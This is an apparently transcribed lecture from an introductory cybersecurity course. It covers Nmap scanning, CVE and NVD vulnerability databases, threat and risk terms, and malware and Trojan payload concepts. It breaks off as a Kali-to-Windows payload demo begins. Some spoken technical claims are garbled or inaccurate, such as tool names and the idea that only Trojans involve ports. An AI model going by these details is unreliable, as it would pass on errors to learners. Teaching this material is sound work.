So a very good afternoon, everyone. I hope everyone is able to hear my voice and see my video. Yeah, can someone specify yes it is or not? Okay, thank you. So yeah, let us continue with today's topic. Yeah, good afternoon, sir. So shall I make co-host, sir?
Sir, good afternoon, sir. Yeah, sir.
How are you, sir?
Sir.
So shall I make this co-host?
Yes, sir. Yes, sir.
Okay. So today is a nice day. Okay. So first of all, I welcome you all for this afternoon session, a fifth day session of cybersecurity essentials training. So yesterday we have initiated with the cybersecurity in continuation to networking essentials. So I hope everyone is clear and also could see the documentation which I had shared in the shared drive. So if not, please go through the documentation. It contains all the documentation with video files as well as the video recordings of the class. All the 3-4 days classes are kept in that. So yesterday we initiated with cybersecurity. We also saw about the importance and the necessity of cybersecurity in the initial time, and then we came through about the internet organization. I mean the INA and all other kind of it associates like RIR, LIR, all these concepts. And we also saw about the 5 phases of hacking. So in that first phase, which we were doing on reconnaissance phase, and then followed up with scanning. So these are the both are pre-hacking phase, and then after that we have to go through the most important phase, which is the hacking phase. I mean, gaining access is the third phase. The fourth phase is maintaining access, and the fifth phase is covering tracks. So all these 5 phases are very important for us. So yesterday we have gone through some elements. I mean, some areas of reconnaissance and also some tools. Like we started with WHOIS. We also saw about how to trace the IPs, and other areas which we have seen is Google hacking also to some elements which we saw, and we also saw about web archives, Wayback Machine, and how to clone the websites, web cloning using HTTrack. So these are some of the areas which we have gone through, and later on we have also gone through some more areas in scanning, the necessity of scanning. Especially, I'm just giving the recap of what all we have covered yesterday. If you have any questions, meanwhile, you can even place it in the chat box so that I can answer during the recap. Okay, I hope some of you has practiced along with it. And most important thing is that please, I have already shared the interview questions. Please go through the interview questions. Very important. One day you cannot digest all the things, so it will be helpful for you, especially if you are going for this type of interviews. So coming back, yes, in the scanning phase, yes, we have gone through the 3-way handshake. That is more important. We also saw about the TCP flags. The flags contain a SYN and I mean ACK with ACK, and of course the communication closure can be either a finish or an RST. So we also saw about the other 2 flags like the priority flag on urgent and let's push. So these are the importance, because if you want to know about how the communication handshake, without knowing handshake, it is very difficult to do scanning. Especially the tool of Nmap, which we have seen, there are various type of scans in Nmap. We saw some of the scans which are available. Broadly, if you say about the scans in Nmap is full connect scan or TCP scan is the most famous, and which we do. The default one which you have done, which will enable you what are all the ports which are open. And then yes, we also saw about the other areas of scanning, like which we call as the protocol scan or the banner. The what we call as the operating system ID, like with hyphen O option, we have done that. And there are many other scans like ICMP ping scan is also there, which will enable you what are all the IPs which are available in the campus network. Yes. So we will continue with scanning in continuation to yesterday. There are many aspects which we need to know about the scanning. Today we will do some areas of scanning, as well as we will also follow some areas of hacking also. Yeah, any questions from any one of you? Please do let me know now. I can take up your questions, and then we can follow up with today's class. No questions from anyone? Okay, so let me move ahead with today's session. But before that, I will share my screen. I think we will go through with some technology presentations, and then we will move ahead with, of course, are you able to see my screen? Someone can say yes or no. Okay, there is a question from Tanmay. Do hackers try to hack cloud? Yes. See, hackers want benefit, whether it is their physical or data center or cloud, it is immaterial for them. If anything is vulnerable, they'll try to gain access. That's all is the hacker's motive. They want something. They want some benefit. It can be value, or it can be even a threat to someone else. It can be value, can be in terms of name, fame, and money. Anything which can. Suppose there are the political. If you say about Pakistan, they will always try to defame India in whatever it is by hacking something or the other. So money is secondary for them. But for some people, money wants. Money wants. We often get mails. You are won in a lottery. You are often getting some mails. You have a parcel waiting at so and so. At the immigration center. Just pay 1% of the amount. You will get millions of. We don't know how many zeros are there. That many dollars. So yeah, where it is not security, the question is not complete. Vardhan. In cloud, who said that there is no security? The question was, do hackers try to hack cloud? I said yes, but security should be there. If security is not there, then anywhere they will hack. Anywhere they will hack. Cloud means that there should be some model of security. Without security, you cannot you cannot keep your assets at any point, any place. And believe me, in cloud you have much security, because there are set of admins who are sitting across. They monitor security a lot, especially if you sign up with Amazon or Azure or maybe any other Google Cloud or anything. So whenever you have clouds like private cloud or something like that, definitely today, if I tell you 30 to 40% of the resources are running on cloud. All the business enterprise, all the startup companies, they are running on cloud only, because the very reason why they do on cloud is because of three reasons. The first one is they need not worry about the administration part. It is very easy to host. Even an ordinary a level 1 guy also can learn, like entry people, even like you also can learn cloud, and then you can host the servers which you need. That is easiest way. Second thing is, the most important elements is like you can go pay as you go. If you do not want, you can just scrap it off. That is very easily. Okay. So Nikhil was saying sometimes we are unable to track hackers, right? Yeah, how is it possible? Or how do you hide their IPs? We will learn all these things. See, do anyone keep a board on their head or on their neck saying that I am a hacker? No one does. They do it. Only thing we have to trace out. We have to trace out with our tools and all these things. We will learn about all those things. First thing is that we have to see that hackers should not enter into our network. That is how we have to figure out the vulnerabilities. We will learn about that. We will also learn about how we can basically mitigate the vulnerabilities. These are the threats. See, in cloud means the advantages is one is it is cheap, I mean highly secure and easy administration. Highly secure and easy administration, I tell you. And if you do not want at any point of time, you can just quit. You can quit. There is no loss of resources. You pay as only as you go. But whereas in your traditional data centers, you have to buy, you have to plan, you have to get an admin, you have to see all the things, and thoroughly you have to do. Even though in cloud, whatever the servers which are there, many people, even Amazon claims, Microsoft claims that their clouds are secure. But if you leak out, if you give your passcodes to someone else and say that don't hack means, how will it? It is not the way. Yeah, even in that way also, if you want to secure your account along with passcodes, you can have your two-factor authentication. I hope you are all familiar with two-factor authentication. There are three factors total. One is what is there in your mind. It is like a passcode or something like that. Passcode is from your memory, which can be transmitted easily to someone else. Second factor is anything which is electronic. Second factor is anything which is electronic, like your OTP, because or your RF authentication. You insert a card, then only it comes. Something like that. That is a two-factor authentication. So today, almost all, even in India also, for any banking transaction, if you want to do, you should have a two-factor authentication. It is secure. If you give that one also, the OTP also to someone else, passcode along with OTP, someone can hack your passcode. But how can they hack your OTP also? Until unless if you are blackmailed or if you are telling the OTP also to others, then only the hacking is possible. Otherwise, in normal grounds, it's not possible. Maximum is that if they know your passcode, they know the balance of your computer or of your account. They cannot hack or they cannot transfer it to their account. Even if you want to transfer 1 or 2 rupees also, they have to go through OTP. So without that, it's not. Even today, you know that very well, right? Even if you want to withdraw money from the ATM beyond 1,000 rupees also, you have to show your OTP. That is how the security is getting enhanced. Whether these servers are in traditional data center or even in what you call as a cloud, it doesn't matter. Only the security matters. The security admin matters. So the very reason why you are getting trained is to become a security admin in the corporate companies and protect the company's assets, IT infrastructure. That is what is the thing which is there. Is this clear? Is this clear? So cloud is secured. It has good amount of infrastructure, but only thing, if you have a horse, you should also know how to ride the horse. Same thing. Cloud is there, infrastructure is there. Only thing, the admin also should be good enough to run the the things which are there. Like security admin is there. He's the main responsible to see vulnerabilities are coming from time to time and report. We will learn those things also, how to take vulnerability report shortly. Okay. So any other questions? Yes, of course. Piracy is nothing but, see, any unauthorized way of doing actions. Anything which is unauthorized. Unauthorized means you are not given authority, but still you are doing some task. It is hacking. Anything. Whether you are copying multiple copies and giving it to some piracy is nothing but hacking. Okay, because it is against the business. Anything which is beyond ethics is also does come under hacking. So we will see about various type of terminology now first, and then we will move ahead with with some exercises which is there. So yeah, see, please ask questions. Don't ask me questions privately. Please ask questions in public so that everyone will understand. Otherwise, I will not be able to say. I'll only read the question and then ask. Others also need to get what is happening. Okay. See, don't say, okay, if it is something very specific, then only you can send it to me. Otherwise, I will not see all those things. Okay, there is another question. Yeah, how can a hacker hack the host with the dynamic IP address? So everything is possible. Everything is possible, whether it is dynamic or it has an IP, right? It has an IP. If you know the website, just ping it, you'll come to know the IP address. Whether it is so today, if I want to know what is the IP of Google.com, you can say CMD. If you say ping www.google.com, it will translate automatically. Any website, you can see this particular one. Or ping-4 will show you in V4. You see this IP address 142. It may not be same of yesterday's. It can differ, but that is managed by DHCP. Is this clear? Is this clear? Okay. So yeah, it is based on ports. Yes, open ports, basically open ports. See, for the like if I say open ports means I mentioned yesterday, we have scanned one of the website. I can say nmap 192.168.1.1, which has some open ports. I can show you. Similarly, we can even do for websites also, any website. So is this nmap legal? Means yes, it is legal. You can do that. You can do that. It's not illegal. Is Google used with help of docs or with help of codes doing legal? Yes, it is legal. No one will catch you for that. Anything what we are learning here, it's legal. But don't try to hack any websites if there are any vulnerabilities figured out. If you figure out any vulnerabilities, just inform the management. That's all. There is a vulnerability. Don't try to hack it. If you are caught by hacking, then or trying to hack also, then you are punishable. Then you are punishable. See, in everywhere there is a methodology of how you can basically be traced. We may think that no one is tracing, but everyone, this since I told you very clearly, IPs are very much recorded everywhere. It is traced even your ISP logs also. So they'll come to know everything. So don't try to just say that, oh, no, it went accidentally. It cannot happen accidentally unless you give a command. Which all ports should be closed and which all not. See, yesterday also I mentioned this particular one. Like I told you, the vulnerable ports which are there. I mean, port number 21 is vulnerable. Port number 23 is vulnerable. I shared that notes also in day one notes. Please go through that. And port number 53 is also vulnerable, which is called a DNS. Port number 67, 68 is also vulnerable. Port number 110 is also vulnerable. So if anything which is there, if you see port number 21, FTP, this is vulnerable. This is vulnerable. So if they unless if you are having a specific service or specific requirement, please don't open this FTP port in internet unless. Otherwise, you have to monitor these ports who are all data transferring from your system or who placing some data into your system. Okay. Otherwise, 80 is a normal port. They don't have anything. So yeah, there is a question on routing. How does that is traced? Do they follow any specific? See, this routing is basically it's not part of or what we call as it is a part of networking. So like I'm not sure about onion routing, but routing means is establishing a path from your source to destination. Is there any, sir? For every routing, there is a specific algorithm. There is a specific algorithm, and also there is a specific process also, and there is a specific multicast also. I'm telling you, for every type of logic of routing, we have a logic. We have even the multicast also. Without that, it won't proceed. So there are about, I said very clearly from 224 dots onwards, it is meant for multicasting. There are number of routing, I mean, what we call as protocols which are there. In dynamic routings, we have static routing, we have even default routing. So one of them can be even the Devjit was mentioning about onion routing, but I'm not familiar on that. Okay, so it's multiple layers between you and server. So it is hard to track it. Not impossible. I agree that. So the more and more strong you are in networking and cyber security, you can the familiarity. Even though strong means the way you work on the systems, the way you work. See, vulnerabilities are not like one-day course or a two-day course. Vulnerabilities keep on coming, keep on coming. You might have heard 2 years back a ransomware attack. Okay, that is also a vulnerability, and suddenly all the websites got collapsed. It can happen. There are many shells shock was there, which happened on Linux servers. Before that, Heartbleed was come. These are dangerous. I mean, very much. We may think everything is secure, but it happens to that. Even last year, also in the month of, I think, if I remember, in July or August, even with one GIF file in WhatsApp, you can hack the WhatsApp account. So that is also possible. It has happened. I traced that. I figured out also. I did that. It really, if one file I send it to you, one GIF file, if you accept that, if you open that GIF file, that's all. Your WhatsApp account I can see all the complete WhatsApp account of yours. In that way it happened. Yes, there is nothing which is in this world which is called as 100% secure. Please remember that. Again, I repeat, there is nothing in this world, in today's world, which is called as 100% secure. Only thing, as an admin, you have to make it 100% tougher for the hackers to hack. So we are going in a way where to make the hackers not enter to your network, or to make hard for the hackers to come inside the network. That is our motto. That is our motto. We have to keep track and all. Today we cannot say that everything is okay. Everything is okay. For today's responsibility, I mean today's the factors, based on today's factors, we can say the vulnerabilities are null. Tomorrow there can be new vulnerabilities which are coming across. For that, again we need to basically deploy the tools and scan. Like your antivirus tools are there, right? Your Avast, or maybe your McAfee, or maybe these all tools. What that is do? It continuously get updated in your system, and then whenever any virus, new virus comes, it will automatically real time. That's called as real time. It will block either from the website, or even from your system, or even from the pen drive. Any source. Source can be from anywhere, right? It can happen. It can happen. Similarly, vulnerabilities also, the vendors which are there. I'll show you a website. I'll show you a website where these vulnerability, I mean the service, the providers, like I can say, vulnerability analysis. Okay, you can say providers. Okay, you can say providers. There is one website which is linked to OWASP. Or OWASP. Okay, so scanning tools, you can say this tool. This, go to this link, you can see this particular one. These are all the people who provide today. These are all the people. So just see this particular one. I can copy paste in your chat box to everyone. Please go through along with this. So these are the, I mean, this is a OWASP, means Open Web Application Security Project. I'll explain about OWASP at a later stage. See all these people, all these vendors. We mean to say these are all the vendors. You can see Acunetics. Okay, most important one, vendors, App Scan. Okay, these are alphabetically as organized. Nothing in Burp Suite is also important. Okay, like you can say maybe Edge Scan, maybe Grabber. I don't know about that. It keeps on added, keeps on added. These are all standard ones which are there. Standard ones. Nessus is also very important. We will do that. Either Nessus or maybe Nikito is also. Nikito is also, because it works only on Linux. It works only on Linux. So Retina, okay. Maybe you can see this one. WP scan, Word Perfect scan is also very important. Word Perfect scan. Okay. Yeah. Jet is also there. Just a second, I'm getting a phone call. I'm sorry. So these are, you can select any of these tools, Some are paid, some of them has a free with limited capacity. You see, the licenses cost not less than $2,000 to $3,000 per year per system. They charge like that. It's not free or cheap like that. It's not free or cheap. Where these people continuously monitor all the vulnerabilities which are coming. Now you may ask a question, sir, where do these vulnerabilities all from time to time, the vulnerabilities are recorded? I will show you. I will show you here. Okay, I'm just closing the chat box. See here, in this is the one of the website. Please go through this website. And what I mean to say is, like, where is this? Okay, so here we go to a website called as NVD. NVD. This is National Vulnerability Database. .nist.gov. Please go through this website. NVD is National Vulnerability Database. .nist. NIST means you know the very well, right? NIST. You had heard. National Institute of Standards Technology. All standards are recorded here. Standards. Okay, this is a government site. So here, especially the vulnerability database, you can see here National Vulnerability Database. Please go through this one, or parallelly go through along with me. What they do, as I said yesterday, any piece of code which is written, any piece of code, whether it is a firmware, operating system, application, any code in any technology, whether it is mobile phone or whether it is a router firmware or anything, wherever any code is there, there can be a vulnerability, especially if it is a networking device, especially if it is a networking device. So this is a team of people, It's not an office. I'm telling you once again, national vulnerability, it's not an office or it's not a company. It's not a corporate. It is government managed by many people, It can be even vendors also like Microsoft, HP, IBM, anyone, even scientists, scholars, project people, whoever are there, many people, anyone can become a vendor, a member in this. So here what they do, even if you figure out to a particular, some new software has been released somewhere and you could trace that there is a potential vulnerability. What you need to do, open a website. There is a website called as CVE Mitre, M-I-T-R-E, mitre.org. Okay, this is an ORG site. CVE, Common Vulnerabilities and Exposures. This is a good site for anyone to open a vulnerability, scan. Vulnerability report. It's not report, a new vulnerability. If you figure out that there is any vulnerability, just new CVE, open a new CVE. You can open a CVE, okay, and open a new request for a CVE ID. So, and give the structure. This is the technology. Structure contains name. What is the vulnerability? This is the structure. This is the software, and this is the vulnerability. So every vulnerability has a number. Once they figure out that this vulnerability is more or less genuine, a team panel will be there. The front-end panel will be there. The panel will review the vulnerability. Okay, there is a Java technology has been released, and this contains for that so and so 8.0.1 version contains a vulnerability on Android phone. So this is how it is there. You post it. Anyone can post it. Anyone can post it. So if you post it, there will be a panel will be scrutinizing. If they figure out, then they will open it. They will open it. Each and every vulnerability is now kept it across in the website. It is public. It cannot be, suppose you may say that I have a product on Microsoft. Microsoft cannot claim that why are you listing out all the vulnerabilities of my product in the public website. It is everyone's right. If there is a vulnerability, whether it is Microsoft or any other firm which is there, whether it is Amazon or anything is there, it has to be notified to the public. It will be coming, and subsequently anyone can work along with that particular product and release a fix. They have to provide a fix. Until unless the fix is provided, it will be there in the public. After the fix also is provided, it will be there in the public. So now let me tell you, every CVE has a number. Every CVE has a number. CVE stands for Common Vulnerabilities and Exposures. Please understand, these type of questions can be asked during the interviews. So what does they do? Once it is recorded, the number, when you get the CVE, it goes to the database, NVD database. Here it has all the database. You can see this one. For every CVE, you can say CVE with the year code 2020, and then the vulnerability number. You can see already to 27,000 we are into. Still we have 3 more months, 2.5 months more. It is going on. Vulnerability number, it starts from 0001. You can see this. I'll just click this one. You can see the structure of how each and every vulnerability is recorded. This is the vulnerability. Okay, one of the vulnerability which has been you see how the, and for every vulnerability the severity is also recorded. Whether it is medium, high impact or low impact or only an informational. So here he has mentioned as out of 10, 6.1 is the impact. Medium impact. You can see this particular one. And now this is basically which devices it's getting affected. That also should be known. Here he has mentioned known affected software configuration. He mentioned that switch to CPE 2.2. Okay, 2.2. Then this is there. The details also will be CVE name, improper neutralization of input during web page generation, cross-site scripting attack. Okay, you can get more details on this also if you go to this particular CWE. Okay, which is weakness enumeration data details. Is this clear? A little bit understanding on this particular. If any fixes are there, the vendors needs to provide the fix. And what these vulnerability companies or whoever these people who are there, see, common one is burp suit. Please, if you have, you can even download the what you call as community edition, not the enterprise edition. Enterprise edition is priced, whereas your community edition is free. You can download some of them, but in community edition, you may not be doing, you may not be able to do what you call as vulnerability and scanning. But whereas Nessus, you have some free checks which you can do. Nessus, you can have, you can download that Nessus, but it will take at least 2 to 3 hours of time to download the complete software. I mean, plugins will be downloaded and get installed into your system. This is supported by Tenable. Okay. And also Acunetics is there. I'll be demonstrating Acunetics also. Okay. But please understand what is CVE. CVE stands for, that is which we spoke about. Where is this? Yeah. CVE stands for Common Vulnerabilities and Exposures. So anyone can launch, I mean, add a common vulnerability, and then these vulnerabilities are recorded. There are number of vulnerabilities. There is one more website also which has the CVE list. Of course, here it is there, CVE list home. You can get through the list. If you know the CVE ID, you can even get through the entries, like maybe the entry name. If I say CVE 2020, maybe something, I don't think it will make use a wildcard like that. You need to search the CVE list and then bring out or entry or ID if it is known. Okay, download CVE. The entire data, if you want, you can get through. Okay, so we saw about how a sample CVE, how it works, how it is being shown across. You can see several other CVEs also, which are the latest things which are into this one, and also the NVD, National Vulnerability Database. This is again very, very important. These two, if you remember these two sites, these two basically manage and record each and every vulnerability which is coming across from time to time. Okay, so 1 second, I think there is some chat question. Yeah, mostly not. If you trust the application, then yes, but because some application try to change system settings, that's why they ask you to switch off firewall or antivirus. See, I'll tell you, Devjit, in production environment, we don't do any of things. It has to go in stable. These all switching off the firewall or antivirus switching off and all these things can be done only in the test environment. I'm telling you very clearly, only in the test environment. If it is production, means anything anyone is doing in for business. Okay. So in business, we don't do any such type of changes. Even we don't apply even patches without testing, without testing. So vulnerabilities do arise. We do a testing part on a test server. If it is okay, then we do it on a production server. Okay. So now let me give a short presentation on what we call as the threats, vulnerabilities, and risks. Okay. So this is very, very important. Just understand this one. What is a threat? What is a vulnerability? These are terminology you can rest assured in your interviews. So threat is basically is not a happening. It is a potential cause of an incident that may cause harm. So threat to a system or an organization. You can see this. Please understand self-explanatory threat. Vulnerability is a weakness. Like we are speaking till now. It can be in your software or it can be any IT infrastructure, which can lead to a threat. Vulnerabilities leads to a threat. Risk is also a potential happening, may happen, may not happen. So potential for loss. It is not risk is a probability. It can or it cannot. So you are leaving something in air, that is called as a risk. Tomorrow I may live or I may not live. It is a risk. So what is that? Coverage. So if you are driving on the road without a helmet, you are in risk. You may meet with an accident. If you meet in with an accident, you may or may not without damage. If you want less damages, then wear something protective measures. Take some protective measures. This is which is called as a risk. Like you see this vulnerability, threat, and risk. These are the three important areas where we need to understand very clearly. Threat is an intruder can exploit the password weakness to break the system. Okay, risk. the threat agents, anything which is there, anything, any entities which made knowingly to seek the manifest is a threat. So these are definitions. I will share this particular one after the presentation. Okay, crackers, information system criminals, vandals. I'm not reading everything. I do not want to waste much time on this. If you have any specific question on this, please ask. These are all the, I mean, who is enemy? Enemy can be any of these people, any of these people. Okay, doing for an intellectual challenge, offenders basically. So I should not say the people who are learning, I mean, certain things for a constructive purpose cannot be configured as what we call. So there is something from the chat. I'll tell you, sir, whenever I'm using my camera or microphone, my antivirus is preventing to do. See, your antivirus is also containing some more additional elements, which is called as a defender or a firewall, preventing additional things. Okay, to do that, so I need to disable the antivirus till I use. No, you can write antivirus exceptions also, or you can configure your defender in such a way that these things can be allowed. Yeah, Devjit has already answered. Yes, it is. You need to configure the antivirus. If you configure, no need to disable. Don't disable. I am not suggesting you to disable antivirus at all. You can have it, but you need to configure. That day I was showing you how you can configure your firewall port. If you want that firewall port, don't disable the port. You can add exception to the firewall and then leave. At least you can monitor only to that particular port. Is this clear? Okay, so this is about I mean offenders, and like you see this motive. This is a generic slide basically why criminals come across, maybe for power assurance, power assertive, anger, sadist, profit oriented, anything. The motive can be any of this. This is a general presentation. I'm showing you this particular areas. It can be any of these actions. So the motive of a cyber criminal. Now, this is one important slide. Risk equal to threat into vulnerability. More vulnerabilities, more the risk. More the threats, more the risk. So if I am about 5% riskier, means less. If my risk is beyond 30% or 40%, anything can happen. Anything can happen. So how we will list out what are all the vulnerabilities are there in the system. See, vulnerabilities listing means yes, we can list out the vulnerabilities also by doing a vulnerability scan. So after doing a scan, if you see that there are high vulnerabilities of 2 or 1 and major, I mean high or medium is considered as dangerous, we have to take up immediate action. Low or informational, not much. Informational is only just an information. It's not a, well, we will not consider at all as an vulnerability also sometimes. But low is also a vulnerability. It may not gain completely access to the system, but there is a slight risk. The chance is there. Okay. So you see this vulnerabilities are there in software bugs, broken process, ineffective controls, hardware flaws, business change. You suddenly change, the platform, or you suddenly change the what we call is the maybe the back end or front end, the model, everything. Then this may lead to risk or inadequate business continuity planning or human errors. Sometimes we overlook, we don't see that there is some error which has happened. This type of human errors come across. Okay, the threats means you can see it may not be directly from the system, but you can see angry employees, dishonest employees, criminals, governments, terrorists, the press, the competitors, the hackers, and also the nature. So all these people are called threats. Why do nature also considered? Yes, you have kept all your systems in a data center and suddenly there is a flood. And because of the flood, it has gone. Or because there is a power outage, all your business is gone. It is a threat. So that if you want to reduce the threat, what you can do? You can divide the resources into 2 or 3 areas. So that flood will not be there in all areas. The power outage will not be there in all areas. So in that way, this is called as BCP. BCP, or what we call business continuity planning. People often do that. They even do for cross location, not only cross locations. It can be in cross countries also. One country may go for an election. One country may not work across. The people may not be there. Entire country may be in a holiday, okay, celebrating some festival, okay, major festival. Then who will, suddenly there is an outage, who will go and perform? So sudden there, generally if the business is there across the globe, then what they do, they deploy in cross country, I mean data centers which are available. This is happening in the cloud, so that their business is always available across across all the globe without interruptions. Okay, so this is about risk into this one. Type of damages, it can be any of these damages. I'm forwarding this one. Components of threat, we spoke just now. Threat agents also, it can be nature or it can be unintentional or intentional. You see that intentional, hostile or non-hostile. Foreign agents, industrial espionage, terrorists, we spoke all this. So these are the top 10 security risks. I'll not be focusing much in detail, which I'll be sending this particular available thing available in the will be available after the class. You can see this. These are generic, self-explanatory also, but still we will also focus on top 10 vulnerabilities, not the threats. Vulnerabilities. Okay. So you can see here also database platform vulnerabilities like SQL injection, etc. is there, and also cross-site scripting, and also denial of service. We'll be understanding about all these type of attacks. Here you can see, I mean, security threats, web threats, I mean, major security threats. I'll speak all these things. These are the type of vulnerability. Now we are coming ahead to the vulnerabilities. So you can have physical vulnerabilities. We will focus on some of the vulnerabilities which are applicable to our system, hardware and software vulnerabilities. Okay. So how do vulnerabilities manifest? Okay, these are all the things. Examples of information security vulnerabilities through employees. This you need to understand, because we will also be learning about social engineering, something like that. Okay, you can see social interaction. That is what which he means to say, customer interaction. So some people may sit behind you. Some people sit and speak something, everything in public areas like a canteen, or maybe what you call as a near to car stand or a cycle stand or whatever, a motorcycle stand. They don't watch even the who all others are walking behind you or beside you, because of many reasons. They will listen everything. They will listen everything. And some people throw important papers or something like that after taking a printout of the draft or something, even their rough notebook or something, into their dustbin. Some people after the office hours, they go and watch into the dustbins of especially in the manager cabins, etc. There can be something which is important because he has taken a printout. All the day he is discussing on something or the other. So there can be potential dangerous people who will watch all this. Sometimes it so happens that in the printer room, if you go to the printer room, there will be good amount of information available of some other project, or sometimes you may see even the pay slips, etc. also in the printer room. So these are all very dangerous. So that's what he was mentioning, mailing room, fax rooms. Okay, all these areas are even the important things which will be the sensitivity data, which will keep it in your shared drives, laptops, or even your temp folders, etc. So people often go through such type of example areas, and then they'll try to hack the systems. Okay, so now these are all some of the presentation elements. Okay, I do not want to go. What is the difference between bug and vulnerability? Vulnerability is different, bug is different. Bug is a basically, like you can see, bug is because of that the programmatic action will be, will not work. Okay, bug means due to that bug, that particular module or that particular scenario will not work faithfully or loyally. That is bug. Vulnerability is the weakness. It will work. In vulnerability, not working is not the question. It will work, but it will do some kind of weakness to others. Is this clear? Is this clear, Tanmay? Bug means the functionality will come down. The functionality will not. But in vulnerability, functionality will be there, but there is a weakness in something else. Both has same thing, but the functionality wise, bug has no functionality, vulnerability has functionality. But something else. Both of them are dangerous, or which causes non-performance, or which cause a threat to the organization. Is this clear, Tanmay?
Sir, but because of a bug, it can cause a vulnerability, no, sir? Because of some bug.
No, bugs are different. You can mention that. You can mention that because of a bug, there is a vulnerability. But all bugs are not vulnerability. Because of bug, right? Because of bug, there can be potentially non-functionality of the program. Okay, because of the bug. Non-functionality, if you have written about 10 modules, because of the bug, 9 may work and 10th one may not work. But vulnerability is that if there is a vulnerability in that particular software, you will see all the 10 programs can be hacked. Is this clear?
Yes, sir.
Okay. Based on the functionality, there is a distinction. But both things are not recommended, are non-operational. It won't work. It's not required. Both things are. There is a slight difference. Okay, so now let me also move ahead with another presentation also. We have one more presentation, and then I will go ahead with today's exercise or lab which we are going to do. Okay, like I have this, we need to know about this, what is this virus and what we call as Trojans. So here in virus, you know about this virus. Virus is nothing but a self-spreaded programs. What is this? So a self-spreaded programs which replicates on its own, whether it is through network or pen drive or anywhere. It is a self-spreading program is called as a virus. Any code, a signature, which can be a signature. You know how much the size can be? It can be as less as 16 bytes or 32 bytes also, not much more. So that code will automatically replicate. Sometimes it enters even into the boot sectors, or it can even smash the entire disk. It can enter this. So those are dangerous. Those are very, very dangerous. So thing is that if the Trojan is nothing but a backdoor. We will learn today how you can create a Trojan also, backdoor. Because of that, the port gets open and the other person can enter into the system and hack your system. Hack means is nothing but anyone, if you are entering into your system without your permission, is called as hacking. We will do that exercise today. Okay. So, but here, yeah, here this is virus. There is a bug. Works wrong. Yeah, functionally. What is intended to do? Vulnerability code works fine. Yes, this is what which I was explaining. Functionality was there is a difference. Otherwise, nothing else. Otherwise, both are not recommended. Bugs only. Functionality wise, it won't work. Yeah. So now malware. Yeah. Let me. Is there any other? Okay. No. Trojans doesn't affect your system. It establishes a backdoor to the intruders. That's all. Your system, you will not know that there is someone who has landed into your system. You will not know if the Trojan is there. The Trojans are nothing but backdoor. It opens up not all ports, a specific port. Okay, if the Trojan is established, it opens a port, and the hacker comes to know that what port is open. Hacker will come to know what port is open, and he will enter into that system. We have about 65536 ports, out of which the Trojan contains one of the port. I'll show you. Okay, we are very near to creating a Trojan. I'll show you. Then you will understand very, very clear. Okay, right. So now let me just give the terminology background, because this is very, very important, especially interview point of view. Malware, you know about malware is nothing but any malicious software which causes potential damage to the system. This is called as malware. It can be virus, worms, spyware, Trojan horse, etc. All this. Please learn the differences of each and everything. There can be a possibility that the questions may come across. What is virus? What is worm? What is spyware? Okay, all these things. Okay. Spywares are nothing but a memory resident program which will spy and give the data like passcodes or maybe anything, any sensitive information to the remote location. That is called as spywares. Okay. So we spoke about virus, like biological virus, the computer virus replicates. The key word in virus is replication. Replication is the main activity which is done in virus. Whereas in Trojan, the main activity which is done is opening a port. It's a backdoor. One word of Trojan is backdoor. One word of virus is replication. Is this clear? Please do understand this one. Both of them are malicious. Malicious means dangerous, potential danger or danger. Symptoms of malware include file size increases in this virus. You may get file sizes increase, or maybe so certain type of virus which are there, like I'll tell you, binders. You will have a program which is legitimate. Legitimate means a genuine program, but it contains a virus. It is complementary. Once if it enters into your system, it can even act like a spyware. It gives all the sensitive information to the remote location, and it tries to replicate on its own to the to the systems which are nearby in the network, or it can be outside the network also, outside, beyond your network also, to all the devices, etc. Is this clear? Is this clear about this malware? Malware is potentially dangerous. See, there is nothing to do for virus about ports. There is nothing to do for virus. Okay. The first thing is virus is a self-replicating program. That's all. Self-replicating. A program when executed, it tries to induct, it tries to land into your memory. From the memory, it goes into any program, whether it is coming from network or it is coming from pen drive or it is coming from anywhere remote. It just replicates the program. It's nothing to do opening of ports. It's nothing to do with ports. Ports means whenever you come across the word called ports means it is Trojans. It is Trojans. Please remember this particular one. Okay. So I'll take up more questions. So this is about malware. In malware, like we will learn about Trojan also. In Trojan, you can see this particular like biological host delivering the payload. Payload is a part of what we call as a Trojan. So here malware characteristics. Please remember this terminology also. Please use this for all. Insertion, avoidance, eradication, replication. This is the life cycle of what you can call as a virus among this triggers and payload. So I'll tell you what is a payload means. Anyway, we are going to learn about payload. Payload means like what you can call as see, if you want to catch a fish, what will we do? We'll keep a what we call as a we go and try to keep something at the end of the bait, right? At the end of the bait, the thing which is really which is very much likely for the fish. Okay, it's not because of likeliness we are trying to keep that, because the fish gets attracted. That is called as a payload. That when you show the payload, the fish will come and it will be trapped. It will be the trap, the bait which we have learned. Same thing here also, payload. We create a payload, we give it to the victims. Victim tries to execute that finished. His system is hacked. So this is how the payload actions. So at the end actions, and he will not come to know any action which has been, because the payload contains a malware. A malware, when if he executes on that particular system, automatically a port gets opened and it will also inform the hacker. It will also inform. There is a reverse communication which is happening to the hacker. So once if he sees that, if he gets a notification, so and so IP has used my payload, like this, when the fish catches that bait, is caught on the bait, it will try to move here and there. The person who is, he will try to immediately pull the fish out, so that the fish life is finished. So here also same thing. The hacker will come to know, oh, so and so has accepted my payload. So there is a backdoor which has happened, and then we can catch that particular he'll directly enter into the system. Whatever are the resources, he can access into that. So this is about the malware. Worms and virus also, this slide you can understand. I think Debjit is asking about that. Virus are the malware that replicate after for user. Like there is a, unlike virus, worms do not need action to replicate. Worms spread automatically, seeking and exploiting specific vulnerabilities to load onto systems and replicate to other systems. Worms, this is the main difference between worms and virus. Okay, I'll quickly go ahead to the, what we call as, I'll showing you the demonstration of how I can create a payload on Linux server, and I will hack a Windows system. I'll hack a Windows system. So here, let me close some of the elements. So these presentations I'll give. If you have anything, the definitions, all these things are available. Please go through, no problem. Ransomware is also there, malware remediation. So these things are, OWASP, I'll be, from here onwards, I'll be speaking some other web application attacks. We have a different day for understanding this particular web attacks. We have a separate session for that. Till this malware remediation, you can go through about malware and ransomware. Okay, so yeah, so for my understanding, in the same system, I have a virtual machine. You can see this running on this virtual machine. You can see this particular one. In this, I have a Kali Linux as well as Windows 7 also. This is my Windows 7 system. You can see this. Please understand the what we call the infrastructure of how I have done. Okay, so here in this Windows, you can see this, I mean CMD, if I say CMD, this is one machine which I have. The IP address of this Windows machine is something like 1.38. 1.38. This is one machine. Okay, I have another machine which is called Kali Linux. You can see this, the default root is tour. Let me log in and see this particular one. This is Kali Linux. If you're not familiar, I'll just brief it. This is Linux. This is Linux software which contains, Kali has all the cyber security tools inside. Not only cyber security, cyber forensics, IoT tools also are built in. The other versions of Kali Linux is you can have even Parrot also. Parrot Linux, which is also 